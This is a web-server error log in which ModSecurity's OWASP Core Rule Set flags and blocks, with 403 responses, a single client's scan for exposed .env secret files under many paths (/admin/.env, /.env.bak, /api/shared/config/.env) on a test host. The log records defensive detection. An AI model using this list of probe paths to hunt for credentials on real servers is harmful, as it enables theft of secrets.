[Thu Feb 26 02:08:04.117514 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_wAAAAI"]
[Thu Feb 26 02:08:04.117736 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_wAAAAI"]
[Thu Feb 26 02:08:04.117936 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjn_wAAAAI"]
[Thu Feb 26 02:08:04.163406 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAAAAAAI"]
[Thu Feb 26 02:08:04.163631 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAAAAAAI"]
[Thu Feb 26 02:08:04.163817 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAAAAAAI"]
[Thu Feb 26 02:08:04.219003 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAQAAAAI"]
[Thu Feb 26 02:08:04.219250 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAQAAAAI"]
[Thu Feb 26 02:08:04.219449 2026] [:error] [pid 2330790] [client 195.178.110.33:39824] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aZ-c9ICbt-ue5ARpbmjoAQAAAAI"]
[Thu Feb 26 02:08:20.063905 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZ-dBM9iaYbHzIBMVEXXuwAAAAc"]
[Thu Feb 26 02:08:20.064154 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZ-dBM9iaYbHzIBMVEXXuwAAAAc"]
[Thu Feb 26 02:08:20.064351 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aZ-dBM9iaYbHzIBMVEXXuwAAAAc"]
[Thu Feb 26 02:08:21.379020 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvAAAAAc"]
[Thu Feb 26 02:08:21.379275 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvAAAAAc"]
[Thu Feb 26 02:08:21.379459 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvAAAAAc"]
[Thu Feb 26 02:08:21.424090 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvQAAAAc"]
[Thu Feb 26 02:08:21.424301 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvQAAAAc"]
[Thu Feb 26 02:08:21.424508 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvQAAAAc"]
[Thu Feb 26 02:08:21.472123 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvgAAAAc"]
[Thu Feb 26 02:08:21.472234 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvgAAAAc"]
[Thu Feb 26 02:08:21.472441 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvgAAAAc"]
[Thu Feb 26 02:08:21.472611 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aZ-dBc9iaYbHzIBMVEXXvgAAAAc"]
[Thu Feb 26 02:08:21.745987 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXwgAAAAc"]
[Thu Feb 26 02:08:21.746194 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXwgAAAAc"]
[Thu Feb 26 02:08:21.746385 2026] [:error] [pid 2331624] [client 195.178.110.33:56006] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aZ-dBc9iaYbHzIBMVEXXwgAAAAc"]
[Thu Feb 26 02:08:21.914979 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rAAAAAA"]
[Thu Feb 26 02:08:21.915219 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rAAAAAA"]
[Thu Feb 26 02:08:21.915402 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rAAAAAA"]
[Thu Feb 26 02:08:21.974013 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rQAAAAA"]
[Thu Feb 26 02:08:21.974231 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rQAAAAA"]
[Thu Feb 26 02:08:21.974453 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aZ-dBSSJSniLip0oFXi1rQAAAAA"]
[Thu Feb 26 02:08:22.036236 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rgAAAAA"]
[Thu Feb 26 02:08:22.036564 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rgAAAAA"]
[Thu Feb 26 02:08:22.036817 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rgAAAAA"]
[Thu Feb 26 02:08:22.091988 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rwAAAAA"]
[Thu Feb 26 02:08:22.092212 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rwAAAAA"]
[Thu Feb 26 02:08:22.092403 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aZ-dBiSJSniLip0oFXi1rwAAAAA"]
[Thu Feb 26 02:08:22.291636 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZ-dBiSJSniLip0oFXi1sgAAAAA"]
[Thu Feb 26 02:08:22.291900 2026] [:error] [pid 2330788] [client 195.178.110.33:56012] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aZ-dBiSJSniLip0oFXi1sgAAAAA"]
